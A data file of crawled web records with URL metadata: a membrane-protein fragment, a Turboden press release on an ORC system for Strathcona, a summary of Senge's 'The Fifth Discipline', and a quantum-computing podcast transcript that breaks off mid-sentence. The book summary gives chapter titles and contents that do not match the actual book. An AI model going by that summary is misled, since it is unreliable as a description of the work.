1.2 x 106 scientific papers contain the term “membrane protein”, underlining the importance of this protein group. In summary, research on membrane proteins and their implication for developmental processes and disease is fundamental, mandatory, and represent the cutting edge of corresponding research.
systems_science
https://www.turboden.com/company/media/press/press-releases/4557/turboden-to-design-and-produce-orc-system-for-canadian-oil-and-gas-producer-strathcona-resources-ltd
2024-03-01T10:35:09
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947475238.84/warc/CC-MAIN-20240301093751-20240301123751-00531.warc.gz
0.919341
498
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__209930491
en
Turboden to design and produce Organic Rankine Cycle system for Canadian oil and gas producer, Strathcona Resources Ltd. 10 January 2024 Turboden S.p.A., a Mitsubishi Heavy Industries Group company, is pleased to announce that it has been selected by Strathcona Resources Ltd. (“Strathcona”) to design and produce North America’s largest single-shaft turbine Organic Rankine Cycle (ORC) system with a gross nameplate capacity of up to 19 megawatts. The ORC system, which is planned to be implemented at Strathcona’s Orion thermal oil facility located near Cold Lake, Alberta, Canada, will use waste heat recovery to generate carbon free electricity, offsetting approximately 80% of the facility’s existing grid-power consumption. “Turboden has successfully implemented more than 400 ORC systems all over the world and across many diverse industries,” says Paolo Bertuzzi, CEO, Turboden. “We’re excited to showcase the substantial operational and environmental benefits of our technology at this scale and in this environment.” Implementing ORC technology at steam assisted gravity drainage (SAGD) operations, like Orion, will allow Strathcona to capture previously lost low-grade thermal heat at approximately 150°C and convert it to emissions free electricity that can be used to help self-power operations and reduce need to draw from the local power grid. Low-grade thermal heat from the Orion facility was previously released through aerial coolers. “We see tremendous value in implementing Turboden’s ORC system at our Orion facility,” shares Rob Morgan, President & CEO of Strathcona Resources. “The technology will convert a waste energy stream from our SAGD operation into usable electricity, lowering power supply costs and reducing the carbon footprint of our operation - demonstrating once again how technology can be applied to improve both the economic and environmental performance of our industry.” Strathcona’s ORC implementation is slated for completion in the first half of 2025. The project will be constructed within the facility’s existing operational footprint and is estimated to result in approximately 740,000 tonnes of GHG emissions reductions over the project lifetime, the equivalent of taking approximately 226,000 cars off the road.
systems_science
https://www.booksplease.com/building-learning-organizations-key-insights-from-peter-senges-the-fifth-discipline/
2024-02-27T18:10:04
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474676.79/warc/CC-MAIN-20240227153053-20240227183053-00479.warc.gz
0.931853
3,657
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__65019325
en
In “The Fifth Discipline,” Peter M. Senge explores the concept of learning organizations and the practices required for fostering organizational excellence in today’s complex world. Senge argues that in order to thrive in an ever-changing environment, organizations must adopt a mindset of continuous learning, challenging their existing mental models, and embracing systems thinking. Written by one of the foremost experts on organizational learning, Peter M. Senge’s groundbreaking work is a must-read for anyone seeking to transform their organization into a dynamic and adaptable entity. Chapter 1: Systems Thinking: Understanding the Power of Interconnectedness Chapter 1 of “The Fifth Discipline” by Peter M. Senge introduces the concept of systems thinking, which is defined as a way of understanding the interconnectedness and interdependency of various elements in a system. Senge highlights the importance of systems thinking as a valuable tool for managing complexity and improving organizational effectiveness. The chapter begins by highlighting the limitations of conventional thinking, which tends to focus on isolated events or problems without considering their broader context. Systems thinking, on the other hand, encourages a more holistic approach that acknowledges the web of relationships and feedback loops that exist within a system. Senge outlines five disciplines that are essential for developing a systems-thinking mindset: personal mastery, mental models, shared vision, team learning, and, ultimately, the fifth discipline, systems thinking itself. He emphasizes that these disciplines should be treated as interrelated and mutually reinforcing, rather than distinct and separate practices. The author also stresses the importance of recognizing and confronting mental models – the deeply ingrained assumptions and beliefs that shape our worldview. By challenging these mental models, individuals and organizations can begin to identify and rectify the systemic causes of persistent problems. Throughout the chapter, examples and case studies are provided to illustrate the powerful impact of systems thinking. One such example is the archetype of the “shifting the burden,” which shows how short-term solutions can lead to unintended consequences in the long run if the underlying systemic issues are not addressed. In summary, Chapter 1 of “The Fifth Discipline” introduces the concept of systems thinking as a means to better understand the interconnectedness of elements within a system. By adopting a systems-thinking mindset and applying the five disciplines, individuals and organizations can uncover the systemic causes of problems and work towards lasting solutions. Chapter 2: Personal Mastery: Cultivating Individual Learning and Growth Chapter 2 of “The Fifth Discipline” by Peter M. Senge, titled “Personal Mastery: Cultivating Individual Learning and Growth,” emphasizes the importance of personal mastery in the development of a learning organization. The chapter starts by defining personal mastery as the discipline of ongoing learning and personal growth. Senge asserts that personal mastery is crucial for individuals to continually expand their knowledge and skills, enabling them to achieve their goals. Personal mastery involves clarifying one’s visions, focusing on truth, and considering reality as it is, rather than how one wishes it to be. Senge introduces the concept of creative tension, which arises when individuals compare their current reality to their desired visions. This tension sparks the motivation to learn and grow, encouraging individuals to reflect on their assumptions and challenge their mental models. Personal mastery involves recognizing and embracing creative tension, turning it into a source of energy and inspiration for self-improvement. Another key aspect of personal mastery highlighted in the chapter is commitment to truth, which includes acknowledging and facing one’s weaknesses and limitations. Senge emphasizes that by seeing oneself objectively and accepting feedback, individuals can recognize their blind spots and continuously learn from their experiences. The chapter also stresses the importance of patience and perseverance in personal mastery. Senge explains that genuine personal growth takes time and effort, as individuals need to develop new habits and continuously practice their new skills. In summary, Chapter 2 of “The Fifth Discipline” emphasizes the significance of personal mastery in cultivating individual learning and growth. It explores the concepts of creative tension, commitment to truth, and the importance of patience and perseverance. Adopting personal mastery enables individuals to continually expand their capabilities, align their actions with their visions, and contribute to the development of a learning organization. Chapter 3: Mental Models: Uncovering and Challenging Limiting Beliefs Chapter 3 of “The Fifth Discipline” by Peter M. Senge is titled “Mental Models: Uncovering and Challenging Limiting Beliefs.” In this chapter, Senge explores the concept of mental models, which are deeply ingrained assumptions and beliefs that shape how individuals perceive and interpret the world. Senge argues that mental models are a fundamental barrier to learning and personal growth. These models act as filters, distorting our understanding of reality and limiting our ability to think creatively and solve problems effectively. Moreover, mental models often prevent organizations from adapting to change and achieving their goals. To overcome these limitations, Senge introduces the concept of “mental models mastery.” This process involves surfacing and challenging our deeply held assumptions, as well as cultivating the ability to see the world from multiple perspectives. By doing so, individuals and organizations can become more flexible, adaptive, and open to new ideas. Senge emphasizes the importance of learning organizations in this process. Learning organizations foster a culture of open communication and continuous learning, encouraging individuals to actively challenge their mental models and engage in collective inquiry. By sharing and integrating different perspectives, organizations can more effectively address complex challenges and make better decisions. In summary, Chapter 3 of “The Fifth Discipline” highlights the significance of mental models and their role in shaping individuals’ perception of the world. Senge emphasizes the need to uncover and challenge these limiting beliefs through a process of mental models mastery, in order to foster personal and organizational growth. Chapter 4: Building Shared Vision: Creating a Compelling Future Together Chapter 4 of “The Fifth Discipline” by Peter M. Senge, titled “Building Shared Vision: Creating a Compelling Future Together,” explores the importance of creating a shared vision within organizations to foster commitment, alignment, and motivation. Senge defines shared vision as a vivid picture of a preferable future that is communicated and embraced by members of an organization. He emphasizes the significance of shared vision in organizations, as it enables the alignment of individual goals with collective objectives and creates a sense of purpose that motivates people to achieve their common aspirations. The author highlights several key concepts and strategies for building shared vision effectively. Firstly, he underscores the importance of personal mastery as a foundation for shared vision, as it involves individuals understanding their own aspirations and purpose. People who are clear about their goals and values are more likely to contribute to the collective vision. Senge also discusses the significance of dialogue in developing shared vision. Dialogue helps individuals challenge their own assumptions, explore different perspectives, and eventually build a coherent collective vision. He encourages the creation of open communication channels where individuals can share their thoughts, listen to others, and collectively refine their understanding of a compelling future. Furthermore, the author stresses that shared vision is not a top-down process, but rather an ongoing dialogue that involves all members of an organization. It should be developed collaboratively, giving everyone the opportunity to contribute and influence the shared vision. In conclusion, Chapter 4 of “The Fifth Discipline” highlights the importance of shared vision as a unifying force within organizations. By fostering personal mastery, encouraging dialogue, and involving all members, organizations can create a compelling future that inspires commitment, alignment, and motivation towards common goals. Chapter 5: Team Learning: Harnessing Collective Intelligence and Collaboration Chapter 5 of “The Fifth Discipline” by Peter M. Senge focuses on the importance of team learning and how it contributes to the success of organizations. According to Senge, team learning is essential in today’s complex and rapidly changing world as it harnesses collective intelligence and collaboration. The chapter begins by highlighting the limitations of individual learning. Although individual learning is crucial, it is not enough to address systemic issues that organizations face. Team learning, on the other hand, brings the collective intelligence of a group together, allowing for a more comprehensive understanding of problems and innovative solutions. Senge introduces the concept of dialogue as a core component of team learning. Dialogue involves open, honest, and non-judgmental communication among team members. It encourages individuals to suspend their assumptions, truly listen to others, and build shared meaning. Through dialogue, teams can discover new insights, challenge existing mental models, and foster a deeper level of trust and collaboration. The author also emphasizes the importance of systems thinking in team learning. Systems thinking enables individuals to understand how their actions and decisions impact the larger system. By recognizing the interconnections and interdependencies within an organization, teams can identify leverage points where small changes can have significant positive outcomes. Senge provides practical guidelines for cultivating effective team learning. He suggests creating a safe environment where individuals can openly express their thoughts and ideas without fear of judgment. He also emphasizes the need for diversity within teams to encourage different perspectives and prevent groupthink. In conclusion, Chapter 5 of “The Fifth Discipline” highlights the significance of team learning in harnessing collective intelligence and fostering collaboration within organizations. By engaging in open dialogue, adopting systems thinking, and creating a supportive culture, teams can enhance their capacity to learn and adapt in today’s complex world. Chapter 6: Systems Thinking in Action: Applying the Fifth Discipline in Organizations Chapter 6 of “The Fifth Discipline” by Peter M. Senge is titled “Systems Thinking in Action: Applying the Fifth Discipline in Organizations.” In this chapter, Senge explores the practical applications of systems thinking within organizations. Senge begins by emphasizing the importance of shifting from a conventional linear mindset to a more holistic systems thinking approach. He explains that traditional problem-solving methods often lead to unintended consequences due to their reductionist nature and lack of understanding of the underlying systemic structures at play. The author then introduces a case study of an organization called Hanover Insurance and how they successfully utilized systems thinking to address their business challenges. Hanover Insurance recognized the interconnectedness of different departments and the need for collaboration to achieve desired outcomes. They implemented techniques such as causal loop diagrams and feedback analysis to identify the root causes of problems and develop effective solutions. Senge further emphasizes the need for shared vision and mental models within organizations. He explains how these shared mental models contribute to building a learning organization where every member understands the system and their role within it. This shared understanding leads to a more effective analysis of problems and promotes collaboration among team members. The chapter also discusses the importance of personal mastery and systems thinking as a leadership skill. Senge highlights the role of leaders in fostering a learning culture and creating an environment that encourages open dialogue, questioning assumptions, and challenging the status quo. He emphasizes that leaders must not only embrace systems thinking themselves but also help others develop their own systemic thinking abilities. In conclusion, Chapter 6 of “The Fifth Discipline” highlights the practical applications of systems thinking in organizations. It emphasizes the importance of understanding the bigger picture, promoting collaboration, fostering a shared vision, and developing personal mastery and leadership qualities. By integrating these principles, organizations can become more adaptable, innovative, and effective in solving complex problems. Chapter 7: The Learning Organization: Creating a Culture of Continuous Learning Chapter 7 of “The Fifth Discipline” by Peter M. Senge is entitled “The Learning Organization: Creating a Culture of Continuous Learning.” In this chapter, Senge highlights the importance of creating a learning organization and the key principles associated with it. The chapter starts with Senge emphasizing that organizations need to become learning organizations to survive and thrive in an ever-changing world. He argues that the rate of change in today’s business environment necessitates continuous learning and adaptation. A learning organization is one that actively promotes and facilitates the learning of its members at all levels. Senge introduces five principles that are central to building a culture of continuous learning in an organization. The first principle is “Personal Mastery,” which focuses on encouraging individuals to constantly improve themselves and their skills. The second principle is “Mental Models,” which acknowledges the need to challenge and reshape our beliefs and assumptions to foster new thinking and innovation. The third principle is “Shared Vision,” which emphasizes the importance of aligning all members of the organization with a common vision and purpose. The fourth principle is “Team Learning,” which emphasizes the development of effective team communication and collaboration. Lastly, the fifth principle is “Systems Thinking,” which emphasizes understanding the interconnectedness and interdependencies of various components within an organization. Senge argues that these principles should be integrated into the organization’s structure, processes, and practices. He emphasizes the significance of creating a culture of trust, where people feel safe to take risks, share their ideas, and engage in open dialogue. Learning, according to Senge, involves not only acquiring new knowledge but also the ability to apply it effectively. Overall, this chapter encourages organizations to embrace a learning mindset and actively cultivate a culture of continuous learning, as this is essential for adapting, innovating, and remaining competitive in the face of rapidly changing circumstances. Chapter 8: Leadership and the Fifth Discipline: Fostering Learning and Change Chapter 8 of “The Fifth Discipline” by Peter M. Senge explores the concept of leadership and its role in fostering learning and change within organizations. Senge argues that true leadership goes beyond individual traits or hierarchical positions; it involves the ability to influence others towards shared visions and goals. Senge highlights the importance of systems thinking and the integration of the five disciplines (personal mastery, mental models, shared vision, team learning, and systems thinking) in effective leadership. A leader’s role is to develop a shared vision that inspires people and creates a sense of purpose. They must encourage individual and collective learning by fostering an environment where ideas are freely shared, challenging assumptions and mental models. Leaders are portrayed as designers, responsible for creating organizations that promote learning and growth. They are also facilitators, capable of engaging individuals and teams in dialogue to address conflicts and achieve better decision-making. Senge emphasizes the significance of organizational learning, as it enables a company to adapt and shape its future successfully. The chapter also delves into the importance of personal mastery for leaders. Personal mastery involves the continuous improvement and development of one’s own skills and abilities. Leaders who embody personal mastery inspire others to take on challenges and develop their own mastery. They foster collaboration and empower individuals to take responsibility for their growth. Overall, Chapter 8 emphasizes that leaders play a crucial role in creating learning organizations that adapt to change. By incorporating the principles of systems thinking and fostering personal mastery, shared vision, team learning, and mental models, leaders can foster an environment that encourages continuous learning, innovation, and growth. In conclusion, “The Fifth Discipline” by Peter M. Senge explores the concept of the fifth discipline, or systems thinking, as a crucial skill for organizations to thrive in a constantly changing world. Senge emphasizes the interconnectivity of various parts within a system and highlights the importance of learning, dialogue, and personal mastery in achieving organizational success. He explains the five disciplines of a learning organization: personal mastery, mental models, shared vision, team learning, and systems thinking. Through engaging case studies and practical tools, Senge provides readers with insights on how to foster a culture of continuous learning, collaboration, and innovation. Ultimately, “The Fifth Discipline” serves as a thought-provoking guide for individuals and leaders to transform their organizations by integrating systems thinking into their core practices. 1. The Effective Executive” by Peter F. Drucker: This classic business book provides invaluable insights into effective management and decision-making. Drucker emphasizes the importance of setting priorities, managing time, and focusing on results. It is a must-read for anyone seeking to enhance their leadership skills. 2. Innovation and Entrepreneurship” by Peter F. Drucker: In this book, Drucker explores the principles and practices that drive successful entrepreneurship and innovation. He provides practical guidance on identifying opportunities, fostering creativity, and building a culture of innovation within an organization. This book is essential for aspiring entrepreneurs and leaders looking to drive growth and adapt to a rapidly changing business landscape. 3. Jack: Straight from the Gut” by Jack Welch: Written by one of the most renowned business leaders of our time, this autobiography offers invaluable lessons on leadership, strategy, and organizational transformation. Jack Welch, the former CEO of General Electric, shares his experiences and insights, providing readers with practical advice on how to drive success in a competitive business environment. 4. The Lean Startup” by Eric Ries: This book revolutionized the startup world by introducing the concept of the lean methodology. Ries emphasizes the importance of validated learning, continuous innovation, and rapid experimentation. Whether you’re a budding entrepreneur or work within an established organization, this book will help you adopt a more agile and customer-driven approach to building and scaling your business. 5. Thinking, Fast and Slow” by Daniel Kahneman: This groundbreaking book by Nobel laureate Daniel Kahneman explores the two systems that drive human thinking – the fast, intuitive, and emotional system, and the slow, deliberate, and logical system. Kahneman examines how these systems influence our decision-making and sheds light on the biases and errors that can cloud our judgment. This thought-provoking read will equip you with a better understanding of human behavior and decision-making, making it an essential book for anyone involved in leadership or strategic decision-making.
systems_science
https://ie-knowledgehub.ca/market-hunt-podcast-episode-list/bridging-quantum-physics-and-computer-science/
2023-01-27T01:01:55
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764494852.95/warc/CC-MAIN-20230127001911-20230127031911-00762.warc.gz
0.955756
11,083
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__304331968
en
Quantum computing has been hailed as the next revolution in computer science. What are some market applications and how is quantum tech evolving on the hardware and software side? “For anybody who’s really on the sidelines looking into what’s happening in hardware in quantum computing, it’s a very exciting time because everything is in flux.” Guest bio: Andrew Fursman Andrew Fursman is a Co-Founder of 1QBit and serves as its Chief Executive Officer. Andrew was a Founding Partner of Vancouver-based VCC firm Minor Capital, Co-Founder of Satellogic Nano-Satellites, and Co-Founder of Cloudtel Communications. Andrew studied Economics at the University of Waterloo and Philosophy and Political Science at the University of British Columbia prior to post-graduate programs in Technology Studies at Singularity University and Financial Engineering at Stanford University. On those rare occasions when he is not busy with his 1QBit duties, he indulges his passions for kayaking in the gulf islands and explores practical applications of microbiology at a small home laboratory on Vancouver Island dedicated to experiments with Saccharomyces cerevisiae. More Andrew Fursman media interviews Optical Quantum Systems Ion Quantum Systems Quantum information theory explained – Mark Wilde, McGill fellow, Part 1 Quantum information theory explained – Mark Wilde, Part 2 Ie-Knowledge Hub Sponsor Case Episode research Question What steps can 1Qbit take to find what industry problems can be solved using quantum computing technology? Write to us at [email protected] and we’ll post some of your answers on our website page. Episode Full Transcript Market Hunt S02 E09 / 1Qbit/ Andrew Fursman episode transcript [Begin intro music] Thierry Harris: Imagine a world with computers so powerful they could process problems which would take today’s computers thousands of years to compute and reduce that time seconds. Quantum computing offers this possibility. In this episode of Market Hunt we’ll discuss the ideas, technology, and market opportunities behind Quantum computing. Andrew Fursman: For anybody who’s really on the sidelines looking into what’s happening in hardware in quantum computing, it’s a very exciting time because everything is in flux and all of these technologies are rapidly developing. It really does look a little bit like a horse race where you’re trying to understand who is out in front, and do they have the ability to stay in front? [end intro music] [begin theme song music] Nick Quain: Entrepreneurship is hard, you need to have support there. Andrew Casey: We fundamentally have to learn how to live our lives differently. We can’t keep going the way we have. Handol Kim: It’s not like Google can come and move in and take the entire market. Not yet, right? Thierry Harris: It’s a real balancing act which requires a bit of insanity frankly. But I mean some people are into that stuff I guess. Handol Kim: You know the size of the market, that’s really all you’ve got. Thierry Harris: We’re coming up with some pretty interesting ideas here. Andrew Casey: We’ve solved everything, Thierry Harris: [chuckles] We’ve solved it all. [End theme song music] [Begin promo music] Narration: And now a message from our sponsor, IE-KnowledgeHub. IE-KnowledgeHub is a website dedicated to promoting learning and exchanges on international entrepreneurship. Watch Video Case Studies, listen to podcasts and much more! If you are an education professional looking for course content, an academic researcher seeking research material , or someone interested in business innovation check out Ie-KnowledgeHub. Ie-KnowledgeHub focuses on innovation ecosystems and firms who commercialize their technologies in international markets. Let’s listen in to a Video Case Study featuring Prevtec Microbia. Eric Nadeau: Everything started with a need. The veterinarians called at the reference laboratory for E. coli., different veterinarians, we have a problem, post weaning diarrhea that is more severe than in the past, and the antibiotics don’t work anymore. And we need a solution for this. Narration: That’s Eric Nadeau of Prevtec Microbia. Prevtec develops vaccines to address E. coli outbreaks in swine. Nadeau started as a fundamental scientific researcher at the university of Montreal’s epidemiology department in the faculty of veterinary medicine. He understood the importance of overuse of antibiotics in treating animals. But the decision to use a live bacterial vaccine vs antibiotics isn’t an easy one. Eric Nadeau: When a producer faces a disease, he will look at different products or strategies. And we are calculating everything at the level of cents, not dollars. Narration: To reach farmers, Nadeau had to understand their decision making process. The farmers were making decisions on costs down to the nearest penny. Prevtec’s vaccine was more expensive than antibiotic solutions currently available. He needed to find a way to contrast the vaccine Prevtec had developed with these antibiotics. This was no easy task. He knew he had to be patient. Eric Nadeau: You took the decision, let’s go on antibiotics, but i’m pretty sure in six months you will call me because the antibiotics will not work anymore, you will go on the vaccine, and you will have the insurance that the problem is solved, you can sleep on it and work on other problems you have. Narration: How did Prevtec, a small company born out of a spinoff of a research project at the University of Montreal’s veterinary school build itself into a full blown company? Find out more at the end of the show. You can also checkout the Prevtec Microbia video case study by visiting ie hyphen knowledgehub.ca. And now, back to the show. [End promo music] Thierry Harris: When comparing classical and quantum computers a good metaphor could be of use. Dr. Shohini Ghose, Wilfred Laurier university physicist wants us to think of classical and quantum computers the way we think of a candle and a light bulb, she says quote: “ The lightbulb isn’t just a better candle, it’s something completely different.” Quantum computing today is at the state where classical computers were when they were first being built decades ago. It’s an exciting time. The industry is being pulled by the promise of quantum enabled technologies which will dramatically impact the fields of drug discovery, cryptography, telecommunications, material sciences and financial modelling to name but a few. Deal making among quantum computing companies is at an all-time high. Capital invested in global companies focused on quantum computing and technology has reached $2.5 billion so far this year, according to financial data firm PitchBook. That’s up from $1.5 billion in all of 2020. It’s been predicted that the quantum tech ecosystem consisting of Software & consulting companies, Hardware manufacturers and quantum enabling technology companies could be worth 18 billion by 2024. In terms of patents for quantum hardware, companies like IBM and Canada’s D-Wave lead the pack. On the quantum computing software side, IBM, Microsoft and Google are out in front. Looking at overall, China dominates the U.S by a score of 2 to 1 with more than 3000 patents in the Quantum technology field. On this episode of Market Hunt, we speak with Andrew Fursman, Co-Founder and CEO of 1Qbit. This episode is full of concepts relating to quantum mechanics which might require a bit more research to comprehend. Feel free to explore the episode transcript for links to further reading on topics discussed in this podcast. Andrew starts us off by describing the raison d’être of 1Qbit. Are you ready? Let’s go. Andrew Fursman: 1QBit is really a company that was founded in order to answer the question of why do we need more powerful computers, and what will these more powerful computers look like, and how will we actually employ them to do meaningful work? Of course, we’re extremely excited about the advances within Quantum computation and we see our long-term goal. What I would think of as success would be a future world in which a significant portion of the workload of high-performance computing is being performed on the back end by Quantum computing devices and processors that do not look like what we’re using today, being able to actually draw that through-line from hard industrial problems to new types of computation. If 1QBit was the facilitator that was really enabling that work to happen, I think I would consider our work here a success. Thierry Harris: In a very mercantile sense, you’re almost like a broker for picking the best Quantum solutions to solve some of the industry’s toughest problems. Can you describe perhaps what problems you are attacking at 1QBit? What links you’re having with the industry? Andrew Fursman: Yes, thank you. I would say that 1QBit is very interested in performing that intermediary role, but actually we also really think about being in the middle between those new types of devices. These very hard problems also really helps us to be able to craft those solutions on the software side, but also to give insights to the architectures of these forthcoming devices in order to be able to say, for example, if your device doesn’t have the ability to improve this problem then our partner at this company is not interested in this processor. We like to think that by being in the middle, we actually have the ability to shape both the applications and the hardware. We spread ourselves out from that middle position. A very concrete example is the work that we believe will be changed around how new materials and advanced material discovery and design progresses. Most people know that Quantum computing as an idea actually dates back as early as the 1980s where famously Richard Feynman suggested that if you’re going to try and do computation to understand how the physical world works, if the physical world is based on Quantum information processing then we should probably build Quantum information processors in order to simulate the real world. Essentially saying let’s cut out the middleman and instead of having to try and translate the behavior that we see in the real world into a form that’s amenable to the types of computers that we’ve already built. Instead, we should build new types of computers that compute using the same principles that really animate the universe. Although that sounds pretty heady, you can actually take a very clear example and just say one of 1QBit’s best partners and customers is the materials company, Dow. Dow has a lot of people that it employs to work in laboratories now alongside robots and other advanced devices but really, they’re doing the same work that you would have been familiar with if you were a chemist from the 1800s or the 1900s essentially answering the question of what happens if I pour this vial into that beaker. The reason that this is an interesting paradigm is because if you think about almost any other area of human endeavor, we’ve moved away from trying it out in the real world as a first step, and we typically will do some simulation in a simulated computer world. An example I love to use is just thinking about building an airplane. We don’t do the Wright Brothers thing anymore of building a model, throwing it off a cliff, and hoping that it flies. Instead, we have all of these advanced simulated environments where we can build a simulated plane in a simulated world that all exists in a computer, and to be able to have a great intuition and very good guidance around how to build that plane in order to make sure that it gets the best qualities of lift and flight. Andrew Fursman: We don’t really do that in the materials space right now because the ability for us to create simulated environments for the emergence of say, chemistry from physics is just significantly lower fidelity currently than what’s necessary in order to design new materials instead of discovering them. By taking that process and really moving into an ability to simulate the Quantum world, and to simulate the emergence of chemistry from physics inside this simulated environment, we can really progress advanced materials to the same paradigm that almost every other industry has followed. That’s one of the things that we see as an early win for Quantum computing. Thierry Harris: You’ve said that Quantum computing is the first real revolution in computing. Why is this? Andrew Fursman: The reason that I say that Quantum computing is the first real computing revolution is because of course, you could say that the first computing revolution was going from no computers to computers. That’s absolutely an incredible advance for humanity and the capabilities of our calculating abilities, but every advancement in computing that has really come from the first electromechanical devices through to vacuum tubes and transistors and integrated circuits, all of those different paradigms are better, faster, cheaper, more reliable versions of the same paradigm of computing. Quantum computing is not just an evolution of that same paradigm. It’s really about computing with new fundamental units of computation and those fundamental units are essentially, using quantum information instead of classical information to compute. That just gives you a very rich and diversified set of problems that are amenable to quantum computation. In our view, it’s not as though quantum computers are going to disrupt all of the things that we do with classical computers, instead, we think of quantum computers as augmenting what’s possible to compute in addition to all the classical computing that we have right now. The reason that we think of it as a bit of revolution is it’s almost like a completely new type of computing tool that will be bolted on to our existing computing capabilities in order to make it so that humanity has more computing capabilities, or can compute different types of problems which are forever beyond the reach of our current types of computer. Thierry Harris: I can see the acrobatics in what 1QBit is doing in essence because you have such a proximity to the hardware manufacturers of these quantum computers, but you’re also doing the translation of what those potential computers can be doing and attempting to create software in order to solve real industry problems that are out there. Explain then the quantum hardware ecosystem as it stands right now. Let’s say, for example, if we’re watching a horse race at Belmont, you’ve got Lucky Strike, you’ve got Duff Beer, you’ve got Carlsberg, you’ve got maybe Kokanee as well. I’m giving a lot of beer analogies. I don’t know why, it is early, but I’m just saying that there’s different technologies that are there in terms of different types of quantum computing technologies for these computers. Maybe you can give us a bit of a brief overview of what the ecosystem on the hardware side looks like, and then I’m going to ask you right after what the software side looks like. Andrew Fursman: That’s great. I think, what’s really important to understand about quantum computers is that we’re at an early stage where you could almost think about it as a bunch of organizations are all pursuing different ways to try and build these quantum computing devices. It would be like if we were back in the early days of computers and somebody was trying to build a vacuum tube, and someone else was trying to build a transistor, and someone else was trying to build an integrated circuit. The conversations that you would have in a world like that would be well, it’s probably easier to build a vacuum tube and to get that up and going but vacuum tubes are so large and are they scalable? Maybe, a transistor is a better path to go but transistors are so much more complicated to build. Even getting to one transistor is hard but once you have one transistor it’s much more scalable. These are exactly the kinds of conversations that are happening right now in the mainstream universal circuit model, quantum computing world where we have some people who are trying to essentially takes things that are already computers and make them quantum. You have other groups that are trying to take things that are already quantum and make them into computers. Even within those two fundamentally different approaches there are all kinds of different devices. For example, if you’re trying to take something that’s already a very quantum, mechanical entity and turn it into a computer, you might want to start with a photon. There are a number of organizations that are trying to build photonic quantum computers where the actual fundamental unit of computing is a photon but very similarly, there are other groups that are using things called trapped ion systems where the fundamental unit of computing is the quantum information that exists in an ion that is trapped in a magnetic field. We don’t really know at this point which of those approaches will be more scalable, or which one is likely to have longevity but we do know that there is incredibly diverse efforts occurring right now to pursue both of those paths individually. At the moment, it looks like the ion path forward has been more fruitful in the short term. We’re seeing some really exciting developments around organizations that are building quantum computers that gives these trapped ions as the fundamental method. At the same time, we have groups, large companies like IBM and Google and Microsoft are thinking about trying to take what we already know about building semiconductor computers and trying to turn them into super conductors that are capable of doing the same quantum computer calculations. All of this is happening simultaneously and as you talk about the horse race, there really is the exact same psychology that goes into analyzing this industry where just because your horse is in the lead currently, doesn’t mean it has the stamina to make it all the way to the finish line. There is a who’s-out-in-front-first mentality but there’s also wariness of the tortoise and the hare. Just because for example, you might be further behind in terms of the number of quantum bits of information that you can put into your device, doesn’t necessarily mean that your device is a worse device. It might just mean that it’s harder to get the first couple of bits going but it’s very scalable. For anybody who’s really on the sidelines looking into what’s happening in hardware in quantum computing, it’s a very exciting time because everything is in flux. All of these technologies are rapidly developing. It really does look a little bit like a horse race where you’re trying to understand who is out in front, and do they have the ability to stay in front. What’s really exciting is because all of these devices are in some sense, interchangeable in the same way that you can do the same kind of addition on a vacuum tube as you can do with the transistor. Essentially, you would hope that the same problems that you could run on an ion trap computer wouldn’t be able to be run on a photonic computer. From the perspective of an organization that is trying to build applications for quantum computers, as opposed to trying to pick a horse, instead, you can just cheer on the race because any progress is exciting from the perspective of actually taking these technologies and making them available to industry. Thierry Harris: Really fascinating stuff, very exciting. Maybe there will be a show just to describe this horse race as it goes along at some point for folks who are interested out there because it’s tremendously fascinating, and will have a huge impact. Let’s talk about the software portion right now, and explain a little bit about what companies such as yours are doing with, as you said, the different kinds of horses that you’re picking with the photons, and then with the ions. What your challenge is in producing that software and then marrying it to the industry and the industrial problems that are out there in the world that you’re attempting to solve? Andrew Fursman: In exactly the same way, I find it very helpful to use some analogies to classical computing because people are a little bit more familiar with that paradigm. Many of the mysteries of quantum computing are actually unhelpful in terms of understanding the value of these quantum devices. I think it’s really helpful to demystify the actual computers themselves and to really think about the fact that much like a classical computer way back in the day, if somebody brought you a very fundamental early-stage computing prototype, you would say, “Oh, great. You’ve made a device that it’s capable of adding in binary, that’ll be so helpful for all the binary addition that I do as a banker, or as a lawyer.” All of the people who use computers every day now are clearly not interested in the fundamental capabilities of those devices, instead, they want to use Microsoft Word, or they want to be able to play Minesweeper. That idea of being able to understand the native capabilities of a computer in the classical world, that would be something like adding in binary, and having the vision to be able to say, “Wow, if you can add in binary, you could actually make a word processor.” It’s a pretty big leap, but that leap happens outside of the hardware, that’s really the realm of software. Understanding what are the raw capabilities of these quantum computing devices? How can I actually connect that to an open need that industry has, essentially, where computers today are not capable of solving very complicated problems? Is there some overlap there? Is there something that quantum computers can do that classical computers are not very good at? Because, if you can do something with the classical computer, and a quantum computer, it’s probably better to use a classical computer. They’re more advanced, there’s better ability to understand. We have many years of hardware development. We try and answer two questions. One, what can you do with a quantum computer? That’s really where we started. Now we’re moving I think, into a much more interesting question, which is, what should you do with a quantum computer? I’m sure that’s probably an area we should dig into. Thierry Harris: You also said something very interesting about the potential of quantum computing in the sense that what it does is that it allows us to focus more on what questions we should be asking as humans, which is something that we do very well with our curious minds, and our storytelling capabilities, as opposed to trying to solve those problems once we put these fundamental questions out there or very quirky questions. It doesn’t have to be very serious all the time, and let the computer do what the computer does best, which is compute and then solve the problem to provide us an answer that could be of usefulness for us, really thinking of the computer as a tool. Maybe you can elaborate a little bit on that thought, Andrew for us because I think it’ll help us, again contextualize why quantum computing is something important to be working on right now. Andrew Fursman: Absolutely. One of the things that’s most interesting to understand about where we sit as a species in terms of producing new knowledge, especially in certain areas, like advanced materials and drug discovery, we talk today about drug discovery, material discovery. It’s not too far from the truth, that the way that you find a new drug today is you go into a region of the Amazon, start licking a bunch of trees, and the ones that make you feel funny, you say, “Hey, there might be something here,” and you go and explore why this thing did what it did. That’s an interesting paradigm. Of course, we’re getting much more sophisticated in our understanding of the types of effects that we would like to see. You can imagine, it’s pretty laborsome, laborious to have to go out into the world and just start trying everything in order to see what it does. That paradigm of discovery can be flipped into a paradigm of design. If you have the ability to say, “I can create in a virtual environment, a new material that’s never actually been created in the real world. By analyzing it in this virtual world, I have the ability to understand what it would be like if I were able to produce it.” That allows me to be able to produce a whole bunch of virtual materials, analyze their properties, and select the ones that are most useful for certain applications.” You’re really starting by saying, “I 